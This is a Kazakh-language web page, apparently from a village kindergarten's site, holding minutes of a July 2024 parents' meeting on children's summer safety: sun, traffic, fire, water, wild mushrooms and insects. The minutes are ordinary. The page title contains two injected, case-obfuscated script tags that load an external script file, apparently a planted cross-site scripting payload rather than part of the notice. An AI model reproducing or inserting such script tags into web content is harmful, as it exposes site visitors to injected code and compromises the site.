Жазғы демалыс.Жаздағы қауіпсіздік шаралары<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

25.07.2024

«Ақмола обласы Целиноград ауданы бойынша білім бөлімінің жанындағы Қабанбай батыр ауылы «Балауса» бөбекжайы МКҚК.

 

№  1    хаттамасы

25 шілде 2024 жыл

Қатысқан ата- ана- 59

Қатысқан педагог- 7

 

Күн тәртібінде:

1.  Жаз кезіндегі қауіпсіздік ережелерін сақтау

Тыңдалды:

          Бұл  мәселе бойынша  әдіскер Аубакирова М.Ж мен 10 топтың тәрбиешілері жаз кезіндегі қауіпсіздік ережелерімен таныстырды.

 - Балаға күн тиіп қалмас үшін жаздың ыстық күндері міндетті түрде бас киім кигізу керек;

- Баланы бағдаршамнан өтуге үйретіп, автомобиль тигізуі мүмкін қауіп туралы түсінік беру;

- Балаға ойнау алаңында өзін қалай ұстау керектігін түсіндіру.

- Баланы жазғы кездегі өрт қауіпсіздігі ережелерімен таныстыру керек. Ересек адамсыз от жақпауын өтініп, оның жылдам тарайтындығын айту.

- Балаға  қарауыңызсыз тіпті, үрлемелі дөңгелектер мен матраста болса да суға түсуіне рұқсат бермеуі туралы;

- Кішкентай баланы суға тек жүзгіш жилетпен немесе жеңдікпен жіберу туралы;

- Балаларға суда тығылатын немесе бір-бірін батыратын ойын ойнауына рұқсат бермеңуін.

- Күн қатты ысып кетсе, баланың терісі күйіп кетпес үшін арнайы күннен қорғайтын құрал қолдану туралы..

- Салқын тиіп қалмас үшін баланың суда болған уақытын бақылау;

- Балаға ормандағы таныс емес саңырауқұлақтар мен жидектерді жеуге болмайтындығын түсіндіру қажеттігі. Олар улы болуы мүмкін;

- Сона, ара секілді жәндіктердің шағуын болдырмас үшін олар бар кезде қозғалмай тұру керектігін айту;

- Баланы қараусыз қалдырмаған туралы..

 

 Қаралған мәселелер бойынша ата- аналар кері байланыс берді

 

Шешім:

1.Жазғы демалыс қауіпсіздік ережелерін сақтауын қадағалау ата-аналарға міндеттелсін.

 2. Жазғы демалысының ережелерін сақтауды қатаң бақылауға алу, ата-ана тарапынан берілетін тәлім тәрбие жұмыстарына немқұрайлы қарамай, өз перзентінің өмір қауіпсіздігі тәрбиеленушілердің ата-аналарға тапсырылсын.

 

 

                                       Әдіскер:                               Аубакирова М.Ж.

                                       Хатшы:                                Жумабекова А.

 

Просмотров: 4252

Қосымшалар:



Пікір қосу



Деректерді қолтаңбаға қосу